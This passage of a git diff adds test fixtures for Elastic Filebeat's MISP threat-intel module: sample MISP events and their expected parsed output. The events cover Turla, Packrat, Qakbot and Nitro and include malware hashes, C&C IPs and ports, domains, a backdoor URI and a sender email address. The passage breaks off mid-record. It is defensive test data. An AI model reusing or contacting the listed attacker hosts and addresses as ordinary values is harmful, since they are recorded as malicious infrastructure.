Whitepaper","published":true,"uuid":"5a5395d1-40a0-45fc-b692-334a0a016219","attribute_count":"61","analysis":"0","timestamp":"1535462417","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637953","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f","local":false},"Attribute":{"id":"17322","type":"filename|sha1","category":"Artifacts dropped","to_ids":false,"uuid":"5a539ce1-e6a0-426a-942c-2fc50a016219","event_id":"158","distribution":"5","timestamp":"1515429089","comment":"JavaScript backdoor","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"google_update_checker.js|c51d288469df9f25e2fb7ac491918b3e579282ea","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[{"Event":{"id":"58","date":"2018-08-17","threat_level_id":"1","info":"Turla Outlook White Paper","published":true,"uuid":"5b773e07-e694-458b-b99c-27f30a016219","analysis":"0","timestamp":"1535462383","distribution":"3","org_id":"1","orgc_id":"5","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5"},"Orgc":{"id":"5","name":"ESET","uuid":"55f6ea5e-51ac-4344-bc8c-4170950d210f"}}}],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"7","name":"misp-galaxy:threat-actor=\"Turla Group\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0},{"id":"70","name":"Turla","colour":"#f20f53","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12268","type":"email-src","category":"Payload delivery","to_ids":true,"uuid":"56ccdcb6-4d6c-4e48-b955-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266422","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"claudiobonadio88@gmail.com","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"22","orgc_id":"4","org_id":"1","date":"2015-12-08","threat_level_id":"3","info":"Packrat: Seven Years of a South American Threat Actor","published":true,"uuid":"56ccdcaf-f7e4-40d8-bca1-51299062e56a","attribute_count":"133","analysis":"2","timestamp":"1516723796","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637901","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"12298","type":"regkey","category":"Artifacts dropped","to_ids":true,"uuid":"56ccdcd6-f4b8-4383-9624-52849062e56a","event_id":"22","distribution":"5","timestamp":"1456266454","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"HKLM\\SOFTWARE\\Microsoft\\Active","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0}]}} +{"Event":{"id":"10","orgc_id":"4","org_id":"1","date":"2020-12-09","threat_level_id":"3","info":"Recent Qakbot (Qbot) activity","published":true,"uuid":"5fd0c599-ab6c-4ba1-a69a-df9ec0a8ab16","attribute_count":"15","analysis":"2","timestamp":"1607868196","distribution":"3","proposal_email_lock":false,"locked":false,"publish_timestamp":"1610637888","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","Org":{"id":"1","name":"ORGNAME","uuid":"5877549f-ea76-4b91-91fb-c72ad682b4a5","local":true},"Orgc":{"id":"4","name":"CUDESO","uuid":"56c42374-fdb8-4544-a218-41ffc0a8ab16","local":false},"Attribute":{"id":"10686","type":"ip-dst|port","category":"Network activity","to_ids":true,"uuid":"5fd0c620-a844-4ace-9710-a37bc0a8ab16","event_id":"10","distribution":"5","timestamp":"1607517728","comment":"On port 2222","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"first_seen":null,"last_seen":null,"value":"62.38.114.12|2222","Galaxy":[],"ShadowAttribute":[]},"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[],"Object":[],"EventReport":[],"Tag":[{"id":"3","name":"tlp:white","colour":"#ffffff","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":false,"is_custom_galaxy":false,"local":0},{"id":"6","name":"misp-galaxy:banker=\"Qakbot\"","colour":"#0088cc","exportable":true,"user_id":"0","hide_tag":false,"numerical_value":null,"is_galaxy":true,"is_custom_galaxy":false,"local":0}]}} \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json new file mode 100644 index 000000000000..660df12cb768 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/misp/test/misp_sample.ndjson.log-expected.json @@ -0,0 +1,743 @@ +[ + { + "@timestamp": "2017-08-28T14:24:32.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 0, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:ransomware=Dharma Ransomware", + "type:OSINT", + "tlp:white", + "malware_classification:malware-category=Ransomware", + "osint:source-type=blog - post" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Payload delivery", + "threatintel.misp.attribute.comment": "- Xchecked via VT: a683494fc0d017fd3b4638f8b84caaaac145cc28bc211bd7361723368b4bb21e", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "5", + "threatintel.misp.attribute.id": "351", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1503930272", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "md5", + "threatintel.misp.attribute_count": "7", + "threatintel.misp.date": "2017-08-25", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "5", + "threatintel.misp.info": "OSINT - New Arena Crysis Ransomware Variant Released", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CIRCL", + "threatintel.misp.orgc.uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1603226331", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "59a3d08d-5dc8-4153-bc7c-456d950d210f" + }, + { + "@timestamp": "2018-11-19T18:34:42.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 8248, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:ransomware=Dharma Ransomware", + "type:OSINT", + "tlp:white", + "malware_classification:malware-category=Ransomware", + "osint:source-type=blog - post" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "1st stage", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "14", + "threatintel.misp.attribute.id": "10794", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1542652482", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "domain|ip", + "threatintel.misp.attribute.value": "your-ip.getmyip.com|178.128.103.74", + "threatintel.misp.attribute_count": "7", + "threatintel.misp.date": "2017-08-25", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "5", + "threatintel.misp.info": "OSINT - New Arena Crysis Ransomware Variant Released", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CIRCL", + "threatintel.misp.orgc.uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1603226331", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "59a3d08d-5dc8-4153-bc7c-456d950d210f" + }, + { + "@timestamp": "2017-03-30T12:55:50.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 16434, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:tool=Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "Carbon sample - Xchecked via VT: a08b8371ead1919500a4759c2f46553620d5a9d9", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "4", + "threatintel.misp.attribute.id": "342", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1490878550", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "link", + "threatintel.misp.attribute_count": "100", + "threatintel.misp.date": "2017-03-30", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "4", + "threatintel.misp.info": "OSINT - Carbon Paper: Peering into Turla\u2019s second stage backdoor", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CIRCL", + "threatintel.misp.orgc.uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1603226330", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 3, + "threatintel.misp.uuid": "58dcfe62-ed84-4e5e-b293-4991950d210f" + }, + { + "@timestamp": "2014-10-06T07:09:54.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 20139, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1077", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579394", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "sha256", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2014-10-06T07:10:57.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 21711, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1084", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579457", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "ip-dst", + "threatintel.misp.attribute.value": "223.25.233.248", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2014-10-06T07:12:28.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 23232, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1086", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579548", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "hostname", + "threatintel.misp.attribute.value": "xenserver.ddns.net", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2014-10-06T07:12:57.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 24759, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1089", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1412579577", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "text", + "threatintel.misp.attribute.value": "Nitro", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2016-02-18T20:12:23.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 26271, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "External analysis", + "threatintel.misp.attribute.comment": "Automatically added (via 7915aabb2e66ff14841e4ef0fbff7486)", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "2", + "threatintel.misp.attribute.id": "1090", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1455826343", + "threatintel.misp.attribute.to_ids": true, + "threatintel.misp.attribute.type": "sha1", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2016-05-05T13:29:23.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 27875, + "service.type": "threatintel", + "tags": [ + "type:OSINT", + "tlp:green" + ], + "threatintel.indicator.marking.tlp": [ + "green" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "22", + "threatintel.misp.attribute.id": "12394", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1462454963", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "domain", + "threatintel.misp.attribute.value": "whatsapp.com", + "threatintel.misp.attribute_count": "29", + "threatintel.misp.date": "2014-10-03", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "2", + "threatintel.misp.info": "OSINT New Indicators of Compromise for APT Group Nitro Uncovered blog post by Palo Alto Networks", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "2", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "CthulhuSPRL.be", + "threatintel.misp.orgc.uuid": "55f6ea5f-fd34-43b8-ac1d-40cb950d210f", + "threatintel.misp.orgc_id": "2", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610622316", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 2, + "threatintel.misp.uuid": "54323f2c-e50c-4268-896c-4867950d210b" + }, + { + "@timestamp": "2018-01-08T16:08:12.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 29397, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:threat-actor=Turla Group", + "Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "Fake adobe URL", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "158", + "threatintel.misp.attribute.id": "17299", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1515427692", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "url", + "threatintel.misp.attribute_count": "61", + "threatintel.misp.date": "2018-01-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "158", + "threatintel.misp.info": "Turla: Mosquito Whitepaper", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "5", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "ESET", + "threatintel.misp.orgc.uuid": "55f6ea5e-51ac-4344-bc8c-4170950d210f", + "threatintel.misp.orgc_id": "5", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637953", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 1, + "threatintel.misp.uuid": "5a5395d1-40a0-45fc-b692-334a0a016219" + }, + { + "@timestamp": "2018-01-08T16:31:29.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 31486, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:threat-actor=Turla Group", + "Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Network activity", + "threatintel.misp.attribute.comment": "Win32 backdoor C&C URI", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "158", + "threatintel.misp.attribute.id": "17330", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1515429089", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "uri", + "threatintel.misp.attribute.value": "/scripts/m/query.php?id=", + "threatintel.misp.attribute_count": "61", + "threatintel.misp.date": "2018-01-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "158", + "threatintel.misp.info": "Turla: Mosquito Whitepaper", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "5", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "ESET", + "threatintel.misp.orgc.uuid": "55f6ea5e-51ac-4344-bc8c-4170950d210f", + "threatintel.misp.orgc_id": "5", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637953", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 1, + "threatintel.misp.uuid": "5a5395d1-40a0-45fc-b692-334a0a016219" + }, + { + "@timestamp": "2018-01-08T16:31:29.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "misp", + "input.type": "log", + "log.offset": 33567, + "service.type": "threatintel", + "tags": [ + "misp-galaxy:threat-actor=Turla Group", + "Turla", + "tlp:white" + ], + "threatintel.indicator.marking.tlp": [ + "white" + ], + "threatintel.indicator.type": "unknown", + "threatintel.misp.attribute.category": "Artifacts dropped", + "threatintel.misp.attribute.comment": "JavaScript backdoor", + "threatintel.misp.attribute.deleted": false, + "threatintel.misp.attribute.disable_correlation": false, + "threatintel.misp.attribute.distribution": "5", + "threatintel.misp.attribute.event_id": "158", + "threatintel.misp.attribute.id": "17322", + "threatintel.misp.attribute.object_id": "0", + "threatintel.misp.attribute.sharing_group_id": "0", + "threatintel.misp.attribute.timestamp": "1515429089", + "threatintel.misp.attribute.to_ids": false, + "threatintel.misp.attribute.type": "filename|sha1", + "threatintel.misp.attribute_count": "61", + "threatintel.misp.date": "2018-01-08", + "threatintel.misp.disable_correlation": false, + "threatintel.misp.distribution": "3", + "threatintel.misp.extends_uuid": "", + "threatintel.misp.id": "158", + "threatintel.misp.info": "Turla: Mosquito Whitepaper", + "threatintel.misp.locked": false, + "threatintel.misp.org_id": "1", + "threatintel.misp.orgc.id": "5", + "threatintel.misp.orgc.local": false, + "threatintel.misp.orgc.name": "ESET", + "threatintel.misp.orgc.uuid": "55f6ea5e-51ac-4344-bc8c-4170950d210f", + "threatintel.misp.orgc_id": "5", + "threatintel.misp.proposal_email_lock": false, + "threatintel.misp.publish_timestamp": "1610637953", + "threatintel.misp.published": true, + "threatintel.misp.sharing_group_id": "0", + "threatintel.misp.threat_level_id": 1, + "threatintel.misp.uuid": "5a5395d1-40a0-45fc-b692-334a0a016219" + }, + { + "@timestamp": "2016-02-23T22:27:02.000Z", + "event.category": "threat", + "event.dataset": "threatintel.misp", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": 